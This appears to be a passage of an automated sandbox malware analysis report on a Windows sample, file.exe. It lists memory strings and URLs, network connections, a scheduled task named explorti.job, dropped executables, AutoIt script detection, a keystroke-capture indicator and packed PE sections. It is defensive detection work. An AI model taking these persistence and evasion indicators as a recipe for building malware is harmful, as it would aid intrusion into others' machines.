Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/how_controls_work_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/next_steps.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/next_steps_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/setup_controls.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/setup_controls_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/who_parent.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/who_parent_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/who_teen.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/teensupervisionreview/who_teen_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/teentoadultgraduation/supervision_choice.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/teentoadultgraduation/supervision_choice_darkmode.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/kid_setup_parent_escalation.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/kid_setup_parent_escalation_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/send_email_confirmation.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/send_email_confirmation_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/success_sent_email.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/success_sent_email_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/ulpupgrade/kidprofileupgrade_all_set.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/images/ulpupgrade/kidprofileupgrade_all_set_darkmode.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/all_set.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/all_set_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/almost_done_kids_space_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/almost_done_kids_space_v2.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/alreadyinstalledfamilylink.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/alreadyinstalledfamilylink_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/devices_connected_tablet_v2.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/devices_connected_tablet_v2_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/devices_connected_v2.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/devices_connected_v2_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/emailinstallfamilylink.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/emailinstallfamilylink_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/familylinkinstalling.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/familylinkinstalling_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/hand_over_device_dark_v2.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/hand_over_device_v2.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/installfamilylink.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/installfamilylink_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/linking_accounts_v2.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/linking_accounts_v2_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/locationsetup.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/locationsetup_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/manage_parental_controls_email.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/manage_parental_controls_email_v2_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/manage_parental_controls_v2.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/manage_parental_controls_v2_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/open_family_link_v2.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/open_family_link_v2_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/parents_help.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/parents_help_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/set_up_kids_space.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/set_up_kids_space_dark.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setupcontrol.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setupcontrol_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuplocation.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuplocation_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuptimelimits.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/setuptimelimits_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/supervision_ready_v2.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/supervision_ready_v2_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/youtubeaccess.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/youtubeaccess_dark.svg
Source: chromecache_132.17.dr String found in binary or memory: https://support.google.com/accounts?hl=
Source: chromecache_132.17.dr String found in binary or memory: https://support.google.com/accounts?p=new-si-ui
Source: chromecache_132.17.dr String found in binary or memory: https://support.google.com/websearch/answer/4358949?hl=ko&ref_topic=3285072
Source: IIDHJKFBGIIJJKFIJDBGCBGHID.0.dr String found in binary or memory: https://support.mozilla.org
Source: IIDHJKFBGIIJJKFIJDBGCBGHID.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IIDHJKFBGIIJJKFIJDBGCBGHID.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: chromecache_124.17.dr String found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2449039751.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKECFIEBGCAKJKECGCFI.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2449039751.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKECFIEBGCAKJKECGCFI.0.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2450878675.0000000001B3D000.00000004.00000020.00020000.00000000.sdmp, IJEHIDHD.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: chromecache_132.17.dr String found in binary or memory: https://www.google.com
Source: IJEHIDHD.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_132.17.dr String found in binary or memory: https://www.google.com/intl/
Source: chromecache_132.17.dr String found in binary or memory: https://www.gstatic.com/accounts/speedbump/authzen_optin_illustration.gif
Source: chromecache_132.17.dr String found in binary or memory: https://www.gstatic.com/images/branding/product/2x/chrome_48dp.png
Source: chromecache_132.17.dr String found in binary or memory: https://www.gstatic.com/images/branding/product/2x/googleg_48dp.png
Source: chromecache_132.17.dr String found in binary or memory: https://www.gstatic.com/images/branding/product/2x/gsa_48dp.png
Source: chromecache_132.17.dr String found in binary or memory: https://www.gstatic.com/images/branding/product/2x/play_prism_48dp.png
Source: chromecache_132.17.dr String found in binary or memory: https://www.gstatic.com/images/branding/product/2x/youtube_48dp.png
Source: chromecache_132.17.dr String found in binary or memory: https://www.gstatic.com/images/branding/productlogos/googleg/v6/36px.svg
Source: IIDHJKFBGIIJJKFIJDBGCBGHID.0.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2449562218.0000000000856000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2449562218.00000000008FA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000002.2449562218.0000000000856000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/BGDGIIIE
Source: IIDHJKFBGIIJJKFIJDBGCBGHID.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2449562218.0000000000856000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2449562218.00000000008FA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: IIDHJKFBGIIJJKFIJDBGCBGHID.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2449562218.0000000000856000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/npvZC5maWxl
Source: file.exe, 00000000.00000002.2449562218.00000000008FA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2404220440.000000002F74F000.00000004.00000020.00020000.00000000.sdmp, IIDHJKFBGIIJJKFIJDBGCBGHID.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: IIDHJKFBGIIJJKFIJDBGCBGHID.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2404220440.000000002F74F000.00000004.00000020.00020000.00000000.sdmp, IIDHJKFBGIIJJKFIJDBGCBGHID.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2449562218.00000000008FA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2404220440.000000002F74F000.00000004.00000020.00020000.00000000.sdmp, IIDHJKFBGIIJJKFIJDBGCBGHID.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2449562218.00000000008FA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: 06f6d9547f.exe, 0000000F.00000003.3007411160.0000000003D39000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3007121727.0000000003D00000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012974820.000000000151D000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012164343.000000000151C000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3007248927.0000000003D1C000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000002.3014345363.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012629128.0000000003D41000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3011183886.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012408886.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3007275252.0000000003D32000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: 06f6d9547f.exe, 0000000F.00000002.3014345363.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012408886.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountF
Source: 06f6d9547f.exe, 0000000F.00000002.3014345363.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012408886.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountK%DYW
Source: 06f6d9547f.exe, 0000000F.00000002.3014345363.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012408886.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounts$
Source: chromecache_132.17.dr String found in binary or memory: https://www.youtube.com/t/terms?chromeless=1&hl=
Source: chromecache_132.17.dr String found in binary or memory: https://youtube.com/t/terms?gl=
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:49717 version: TLS 1.2
Installs a raw input device (often for capturing keystrokes)
Source: 06f6d9547f.exe, 0000000F.00000003.3010093216.00000000014D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES memstr_4ec2d118-a

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 06f6d9547f.exe, 0000000F.00000000.2760041133.0000000000762000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_75d7abe5-8
Source: 06f6d9547f.exe, 0000000F.00000000.2760041133.0000000000762000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a650108a-f
Source: 06f6d9547f.exe.13.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_285953fa-0
Source: 06f6d9547f.exe.13.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_48c2599e-7
Source: random[1].exe0.13.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_f7296e6e-0
Source: random[1].exe0.13.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_127521d2-8
PE file contains section with special chars
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name:
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: .idata
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: .idata
Source: explorti.exe.7.dr Static PE information: section name:
PE file has nameless sections
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5BB700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C5BB8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C5BB910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C55F280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5535A0 0_2_6C5535A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C545C 0_2_6C5C545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C565440 0_2_6C565440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C595C10 0_2_6C595C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A2C10 0_2_6C5A2C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CAC00 0_2_6C5CAC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C542B 0_2_6C5C542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57D4D0 0_2_6C57D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5664C0 0_2_6C5664C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C596CF0 0_2_6C596CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55D4E0 0_2_6C55D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C566C80 0_2_6C566C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B34A0 0_2_6C5B34A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BC4A0 0_2_6C5BC4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57ED10 0_2_6C57ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C580512 0_2_6C580512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56FD00 0_2_6C56FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C590DD0 0_2_6C590DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B85F0 0_2_6C5B85F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C579E50 0_2_6C579E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C593E50 0_2_6C593E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A2E4E 0_2_6C5A2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C574640 0_2_6C574640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55C670 0_2_6C55C670
